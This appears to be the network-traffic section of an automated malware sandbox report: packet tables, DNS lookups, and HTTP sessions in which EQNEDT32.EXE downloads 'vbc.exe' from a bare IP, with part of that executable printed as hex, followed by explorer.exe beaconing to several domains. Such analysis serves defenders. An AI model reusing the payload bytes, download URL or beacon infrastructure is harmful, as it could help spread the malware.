                                                  Jan 13, 2022 20:22:55.004297972 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.004307032 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004324913 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004340887 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004357100 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004367113 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.004369974 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004371881 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.004386902 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004400969 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.004405975 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004405975 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.004422903 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004441023 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004456043 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004472017 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.004475117 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.004481077 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.004590988 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.031284094 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.031306028 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.031322002 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.031337976 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.031373024 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.031389952 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.031408072 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.031421900 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.031443119 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.031452894 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.031487942 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.031506062 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:22:55.031553984 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.031932116 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.031950951 CET4916980192.168.2.22195.211.74.112
                                                  Jan 13, 2022 20:22:55.058815002 CET8049169195.211.74.112192.168.2.22
                                                  Jan 13, 2022 20:23:00.219388962 CET4917080192.168.2.22122.10.28.11
                                                  Jan 13, 2022 20:23:00.496140003 CET8049170122.10.28.11192.168.2.22
                                                  Jan 13, 2022 20:23:00.496301889 CET4917080192.168.2.22122.10.28.11
                                                  Jan 13, 2022 20:23:00.496769905 CET4917080192.168.2.22122.10.28.11
                                                  Jan 13, 2022 20:23:00.774905920 CET8049170122.10.28.11192.168.2.22
                                                  Jan 13, 2022 20:23:00.774945021 CET8049170122.10.28.11192.168.2.22
                                                  Jan 13, 2022 20:23:00.774965048 CET8049170122.10.28.11192.168.2.22
                                                  Jan 13, 2022 20:23:00.775353909 CET4917080192.168.2.22122.10.28.11
                                                  Jan 13, 2022 20:23:00.775521040 CET4917080192.168.2.22122.10.28.11
                                                  Jan 13, 2022 20:23:01.052043915 CET8049170122.10.28.11192.168.2.22
                                                  Jan 13, 2022 20:23:05.961662054 CET4917180192.168.2.22216.172.160.188
                                                  Jan 13, 2022 20:23:06.111922979 CET8049171216.172.160.188192.168.2.22
                                                  Jan 13, 2022 20:23:06.112740040 CET4917180192.168.2.22216.172.160.188
                                                  Jan 13, 2022 20:23:06.112768888 CET4917180192.168.2.22216.172.160.188
                                                  Jan 13, 2022 20:23:06.259705067 CET8049171216.172.160.188192.168.2.22
                                                  Jan 13, 2022 20:23:06.319093943 CET8049171216.172.160.188192.168.2.22
                                                  Jan 13, 2022 20:23:06.319129944 CET8049171216.172.160.188192.168.2.22
                                                  Jan 13, 2022 20:23:06.319145918 CET8049171216.172.160.188192.168.2.22
                                                  Jan 13, 2022 20:23:06.319312096 CET4917180192.168.2.22216.172.160.188
                                                  Jan 13, 2022 20:23:06.319381952 CET4917180192.168.2.22216.172.160.188
                                                  Jan 13, 2022 20:23:06.459377050 CET8049171216.172.160.188192.168.2.22
                                                  Jan 13, 2022 20:23:11.477966070 CET4917280192.168.2.22192.185.98.251
                                                  Jan 13, 2022 20:23:11.618901968 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.619119883 CET4917280192.168.2.22192.185.98.251
                                                  Jan 13, 2022 20:23:11.619415045 CET4917280192.168.2.22192.185.98.251
                                                  Jan 13, 2022 20:23:11.760226965 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.771730900 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.771794081 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.771842003 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.771881104 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.771924973 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.771960974 CET4917280192.168.2.22192.185.98.251
                                                  Jan 13, 2022 20:23:11.771965027 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.771994114 CET4917280192.168.2.22192.185.98.251
                                                  Jan 13, 2022 20:23:11.772003889 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.772044897 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.772053957 CET4917280192.168.2.22192.185.98.251
                                                  Jan 13, 2022 20:23:11.772088051 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.772109985 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.772140980 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:11.772206068 CET4917280192.168.2.22192.185.98.251
                                                  Jan 13, 2022 20:23:11.772219896 CET4917280192.168.2.22192.185.98.251
                                                  Jan 13, 2022 20:23:11.772306919 CET4917280192.168.2.22192.185.98.251
                                                  Jan 13, 2022 20:23:11.932857990 CET8049172192.185.98.251192.168.2.22
                                                  Jan 13, 2022 20:23:17.089534044 CET4917480192.168.2.22221.121.143.148
                                                  Jan 13, 2022 20:23:17.359461069 CET8049174221.121.143.148192.168.2.22
                                                  Jan 13, 2022 20:23:17.359688044 CET4917480192.168.2.22221.121.143.148
                                                  Jan 13, 2022 20:23:17.360008955 CET4917480192.168.2.22221.121.143.148
                                                  Jan 13, 2022 20:23:17.639343023 CET8049174221.121.143.148192.168.2.22
                                                  Jan 13, 2022 20:23:17.639389992 CET8049174221.121.143.148192.168.2.22
                                                  Jan 13, 2022 20:23:17.639810085 CET4917480192.168.2.22221.121.143.148
                                                  Jan 13, 2022 20:23:17.639930964 CET4917480192.168.2.22221.121.143.148
                                                  Jan 13, 2022 20:23:17.891347885 CET8049174221.121.143.148192.168.2.22
                                                  Jan 13, 2022 20:23:22.838606119 CET4917580192.168.2.2223.80.120.93
                                                  Jan 13, 2022 20:23:23.008239031 CET804917523.80.120.93192.168.2.22
                                                  Jan 13, 2022 20:23:23.008527040 CET4917580192.168.2.2223.80.120.93
                                                  Jan 13, 2022 20:23:23.008996964 CET4917580192.168.2.2223.80.120.93
                                                  Jan 13, 2022 20:23:23.381628990 CET804917523.80.120.93192.168.2.22
                                                  Jan 13, 2022 20:23:23.537935019 CET804917523.80.120.93192.168.2.22
                                                  Jan 13, 2022 20:23:23.537996054 CET804917523.80.120.93192.168.2.22
                                                  Jan 13, 2022 20:23:23.538315058 CET4917580192.168.2.2223.80.120.93
                                                  Jan 13, 2022 20:23:23.538501978 CET4917580192.168.2.2223.80.120.93
                                                  Jan 13, 2022 20:23:23.707668066 CET804917523.80.120.93192.168.2.22
                                                  Jan 13, 2022 20:23:23.707696915 CET804917523.80.120.93192.168.2.22
                                                  Jan 13, 2022 20:23:23.707772970 CET4917580192.168.2.2223.80.120.93

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 13, 2022 20:22:49.336359024 CET5216753192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:22:49.503792048 CET53521678.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:22:54.885034084 CET5059153192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:22:54.913263083 CET53505918.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:00.037771940 CET5780553192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:00.218267918 CET53578058.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:05.811104059 CET5903053192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:05.959788084 CET53590308.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:11.327357054 CET5918553192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:11.476555109 CET53591858.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:16.774473906 CET5561653192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:17.087388039 CET53556168.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:22.669341087 CET4997253192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:22.836792946 CET53499728.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:28.536506891 CET5177153192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:28.839101076 CET53517718.8.8.8192.168.2.22
                                                  Jan 13, 2022 20:23:38.849476099 CET5986753192.168.2.228.8.8.8
                                                  Jan 13, 2022 20:23:39.019042969 CET53598678.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Jan 13, 2022 20:22:49.336359024 CET192.168.2.228.8.8.80xb710Standard query (0)www.orphe.bizA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:22:54.885034084 CET192.168.2.228.8.8.80x439cStandard query (0)www.circlessalaries.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:00.037771940 CET192.168.2.228.8.8.80xc18cStandard query (0)www.ylhwcl.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:05.811104059 CET192.168.2.228.8.8.80xfc43Standard query (0)www.terapiaholisticaemformacao.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:11.327357054 CET192.168.2.228.8.8.80x9c63Standard query (0)www.ecommerceoptimise.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:16.774473906 CET192.168.2.228.8.8.80x30e0Standard query (0)www.integratedheartspsychology.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:22.669341087 CET192.168.2.228.8.8.80x9037Standard query (0)www.bjbwx114.comA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:28.536506891 CET192.168.2.228.8.8.80xbd42Standard query (0)www.topeasyip.companyA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:38.849476099 CET192.168.2.228.8.8.80x95dcStandard query (0)www.norfg.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Jan 13, 2022 20:22:49.503792048 CET8.8.8.8192.168.2.220xb710No error (0)www.orphe.biz103.224.212.220A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:22:54.913263083 CET8.8.8.8192.168.2.220x439cNo error (0)www.circlessalaries.com195.211.74.112A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:00.218267918 CET8.8.8.8192.168.2.220xc18cNo error (0)www.ylhwcl.com122.10.28.11A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:05.959788084 CET8.8.8.8192.168.2.220xfc43No error (0)www.terapiaholisticaemformacao.comterapiaholisticaemformacao.comCNAME (Canonical name)IN (0x0001)
                                                  Jan 13, 2022 20:23:05.959788084 CET8.8.8.8192.168.2.220xfc43No error (0)terapiaholisticaemformacao.com216.172.160.188A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:11.476555109 CET8.8.8.8192.168.2.220x9c63No error (0)www.ecommerceoptimise.comecommerceoptimise.comCNAME (Canonical name)IN (0x0001)
                                                  Jan 13, 2022 20:23:11.476555109 CET8.8.8.8192.168.2.220x9c63No error (0)ecommerceoptimise.com192.185.98.251A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:17.087388039 CET8.8.8.8192.168.2.220x30e0No error (0)www.integratedheartspsychology.com221.121.143.148A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:22.836792946 CET8.8.8.8192.168.2.220x9037No error (0)www.bjbwx114.com23.80.120.93A (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:28.839101076 CET8.8.8.8192.168.2.220xbd42Name error (3)www.topeasyip.companynonenoneA (IP address)IN (0x0001)
                                                  Jan 13, 2022 20:23:39.019042969 CET8.8.8.8192.168.2.220x95dcNo error (0)www.norfg.com43.134.0.76A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • 198.23.213.59
                                                  • www.orphe.biz
                                                  • www.circlessalaries.com
                                                  • www.ylhwcl.com
                                                  • www.terapiaholisticaemformacao.com
                                                  • www.ecommerceoptimise.com
                                                  • www.integratedheartspsychology.com
                                                  • www.bjbwx114.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.2249167198.23.213.5980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:21:55.695291996 CET0OUTGET /1155/vbc.exe HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 198.23.213.59
                                                  Connection: Keep-Alive
                                                  Jan 13, 2022 20:21:55.811695099 CET1INHTTP/1.1 200 OK
                                                  Date: Fri, 14 Jan 2022 02:21:54 GMT
                                                  Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26
                                                  Last-Modified: Thu, 13 Jan 2022 22:04:27 GMT
                                                  ETag: "66000-5d57ddeb75e04"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 417792
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-msdownload
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 3f e0 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 56 06 00 00 08 00 00 00 00 00 00 3a 75 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 74 06 00 57 00 00 00 00 80 06 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 55 06 00 00 20 00 00 00 56 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 80 06 00 00 06 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 75 06 00 00 00 00 00 48 00 00 00 02 00 05 00 7c 46 06 00 64 2e 00 00 03 00 00 00 2d 00 00 06 f8 5d 00 00 84 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 17 00 00 0a 02 03 7d 01 00 00 04 02 28 18 00 00 0a 6f 19 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 04 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 03 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06 00 00 04 02 7b 08 00 00 04 6f 84 00 00 06 3a 71 ff ff ff 02 28 04 00 00 06 2b 08 02 28 04 00 00 06 de 12 02 14 7d 08 00 00 04 16 0a de 07 02 28 02 00 00 06 dc 06 2a 01 10 00 00 04 00 00 00 f3 f3 00 07 00 00 00 00 6e 02 15 7d 01 00 00 04 02 7b 08 00 00 04 2c 0b 02 7b 08 00 00 04 6f 63 00 00 06 2a 1e 02 7b 02 00 00 04 2a 1a 73 1a 00 00 0a 7a 00 32 02 7b 02
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH?aV:u @ @tW H.text@U V `.rsrcX@@.reloc^@BuH|Fd.-]z(}(o}*0{.3(*0{,.f}}}so}}8{o}{}}}{Y}{-+H{{X{X ;|{Xa}}{o:q(+(}(*n}{,{oc*{*sz2{
                                                  Jan 13, 2022 20:21:55.811763048 CET3INData Raw: 00 00 04 8c 2a 00 00 01 2a 00 00 00 13 30 02 00 3c 00 00 00 03 00 00 11 02 7b 01 00 00 04 1f fe 33 1d 02 7b 03 00 00 04 28 18 00 00 0a 6f 19 00 00 0a 33 0b 02 16 7d 01 00 00 04 02 0a 2b 07 16 73 01 00 00 06 0a 06 02 7b 05 00 00 04 7d 04 00 00 04
                                                  Data Ascii: **0<{3{(o3}+s{}*(*z(}(o}**0`{,.%*}}{}}*}{{X}{@3}+{
                                                  Jan 13, 2022 20:21:55.811800003 CET4INData Raw: 0a 0c 2b 39 20 f7 ce a2 37 28 55 00 00 06 06 28 21 00 00 0a 0c 2b 26 20 a0 ce a2 37 28 55 00 00 06 06 28 21 00 00 0a 0c 2b 13 20 69 ce a2 37 28 55 00 00 06 0c 2b 06 73 22 00 00 0a 7a 08 2a 00 00 00 0a 14 2a 00 13 30 01 00 59 00 00 00 08 00 00 11
                                                  Data Ascii: +9 7(U(!+& 7(U(!+ i7(U+s"z**0Y(E+ +"+++++++s"z*(d*0){Do#{Do#{CX*0E
                                                  Jan 13, 2022 20:21:55.811837912 CET5INData Raw: 06 25 02 7b 33 00 00 04 6f 35 00 00 0a 74 06 00 00 02 6f 1c 00 00 06 6f 1d 00 00 06 25 02 7b 23 00 00 04 6f 33 00 00 0a 6f 39 00 00 0a 2c 30 02 7b 23 00 00 04 6f 33 00 00 0a 02 7b 23 00 00 04 6f 33 00 00 0a 6f 39 00 00 0a 17 59 6f 3a 00 00 0a 74
                                                  Data Ascii: %{3o5too%{#o3o9,0{#o3{#o3o9Yo:toX+oo(%Y,8z{2o;(>s<o!%Y,+L{1o;(>s<o#%Y,+{0o;(>s<
                                                  Jan 13, 2022 20:21:55.926425934 CET7INData Raw: 00 04 6f 55 00 00 0a 02 7b 22 00 00 04 6f 4d 00 00 0a 6f 54 00 00 0a 02 7b 29 00 00 04 6f 55 00 00 0a 02 7b 22 00 00 04 6f 4d 00 00 0a 6f 54 00 00 0a 02 7b 2a 00 00 04 6f 55 00 00 0a 02 7b 22 00 00 04 6f 4d 00 00 0a 6f 54 00 00 0a 02 7b 2b 00 00
                                                  Data Ascii: oU{"oMoT{)oU{"oMoT{*oU{"oMoT{+oU{"oMoT{,oU{"oMoT{-oU{"oMoT{.oU{"oMoT{/oU{"oMoT{0oU{"oMoT{1
                                                  Jan 13, 2022 20:21:55.926457882 CET8INData Raw: 0a 6f 57 00 00 0a 02 7b 2d 00 00 04 1f 09 6f 59 00 00 0a 02 7b 2d 00 00 04 20 25 cd a2 37 28 55 00 00 06 6f 5b 00 00 0a 02 7b 2d 00 00 04 17 6f 5d 00 00 0a 02 7b 2d 00 00 04 02 fe 06 41 00 00 06 73 5e 00 00 0a 6f 5f 00 00 0a 02 7b 2e 00 00 04 1f
                                                  Data Ascii: oW{-oY{- %7(Uo[{-o]{-As^o_{.o\{. x sQoR{. 7(UoS{. sVoW{.oY{. 7(Uo[{.o]{.Cs^o_{/o\{/
                                                  Jan 13, 2022 20:21:55.926476002 CET10INData Raw: 00 00 0a 02 7b 26 00 00 04 1f 4e 20 ea 01 00 00 73 51 00 00 0a 6f 52 00 00 0a 02 7b 26 00 00 04 20 f5 cb a2 37 28 55 00 00 06 6f 53 00 00 0a 02 7b 26 00 00 04 1f 70 1f 17 73 56 00 00 0a 6f 57 00 00 0a 16 0d 73 62 00 00 0a 13 04 28 37 00 00 06 13
                                                  Data Ascii: {&N sQoR{& 7(UoS{&psVoWsb(7+8+"oc(doeX-XX -of(M~! 7(U/% 7(U(gH{{
                                                  Jan 13, 2022 20:21:55.926496029 CET11INData Raw: 54 11 05 11 06 28 59 00 00 06 2c 26 7e 3d 00 00 04 1f 10 60 80 3d 00 00 04 06 20 b0 08 26 85 07 58 08 59 66 65 66 66 65 65 66 65 66 09 59 61 0a 2b 49 17 7e 3d 00 00 04 60 80 3d 00 00 04 06 20 a4 e4 d8 72 07 61 08 58 66 65 66 66 65 66 65 66 65 61
                                                  Data Ascii: T(Y,&~=`= &XYfeffeefefYa+I~=`= raXfeffefefea+&~=`= vYYffeeffeefefYa~<X<*02~9(w~9ox,(V(y*)0" 3l +a
                                                  Jan 13, 2022 20:21:55.926512957 CET12INData Raw: 87 27 2f b0 58 07 61 9d 11 16 73 80 00 00 0a 13 06 11 06 2a 02 06 20 43 81 c3 5a 61 07 59 61 08 61 13 0e 11 0e 20 aa 98 7b bd 06 59 07 61 61 13 0e 7e 3b 00 00 04 6f 5c 00 00 06 11 0e 6a 6f 81 00 00 0a 7e 3f 00 00 04 2c 09 7e 3f 00 00 04 13 0f 2b
                                                  Data Ascii: '/Xas* CZaYaa {Yaa~;o\jo~?,~?+s~73~;o] /XYaah!+~7!!-+?~;!ob+$%G~:_b_caRXi3~;o^a OaXffefeeffeaa KX
                                                  Jan 13, 2022 20:21:55.926528931 CET14INData Raw: 01 00 91 9c 06 11 04 3f 7d ff ff ff 2a 00 00 00 6a 02 28 17 00 00 0a 02 03 7d 41 00 00 04 02 1a 8d 07 00 00 01 7d 42 00 00 04 2a 00 1e 02 7b 41 00 00 04 2a 72 02 18 28 60 00 00 06 02 7b 42 00 00 04 16 91 02 7b 42 00 00 04 17 91 1e 62 60 68 2a 00
                                                  Data Ascii: ?}*j(}A}B*{A*r(`{B{Bb`h*(`{B{Bb`{Bb`{Bb`*sz0Q3!{Ao3(_{B*{A{BYo-(_X2*0
                                                  Jan 13, 2022 20:21:55.926544905 CET15INData Raw: 08 58 09 06 09 19 5f 94 58 61 59 0b 11 05 17 58 13 05 11 05 1f 20 33 c4 16 13 04 2b 0b 06 11 04 16 9e 11 04 17 58 13 04 11 04 1a 33 f0 08 6a 1f 20 62 13 06 11 06 07 6e 60 13 06 11 06 2a 13 30 06 00 f0 00 00 00 26 00 00 11 28 7b 00 00 0a d0 17 00
                                                  Data Ascii: X_XaYX 3+X3j bn`*0&({(+o,.*(o-** ffefeefeffe #fefeffeefef }fefefefeffe feffefefe Dafefefeffei ci+6bcaX_XaXX


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.2249168103.224.212.22080C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:22:49.687273026 CET439OUTGET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1
                                                  Host: www.orphe.biz
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:22:49.874944925 CET440INHTTP/1.1 302 Found
                                                  Date: Thu, 13 Jan 2022 19:22:49 GMT
                                                  Server: Apache/2.4.25 (Debian)
                                                  Set-Cookie: __tad=1642101769.6856294; expires=Sun, 11-Jan-2032 19:22:49 GMT; Max-Age=315360000
                                                  Location: http://ww25.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew==&subid1=20220114-0622-493b-bd82-791d388f7025
                                                  Content-Length: 0
                                                  Connection: close
                                                  Content-Type: text/html; charset=UTF-8


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.2249169195.211.74.11280C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:22:54.941361904 CET441OUTGET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.circlessalaries.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:22:54.977261066 CET442INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 13 Jan 2022 19:22:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  X-Powered-By: PHP/7.2.24
                                                  Data Raw: 31 66 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 6c 61 63 65 68 6f 6c 64 65 72 20 26 6e 64 61 73 68 3b 20 41 6e 74 61 67 6f 6e 69 73 74 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6e 74 61 67 6f 6e 69 73 74 2e 6e 6c 2f 73 74 61 74 69 63 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2e 33 2e 31 2e 6d 69 6e 2e 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6e 74 61 67 6f 6e 69 73 74 2e 6e 6c 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 33 2e 34 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 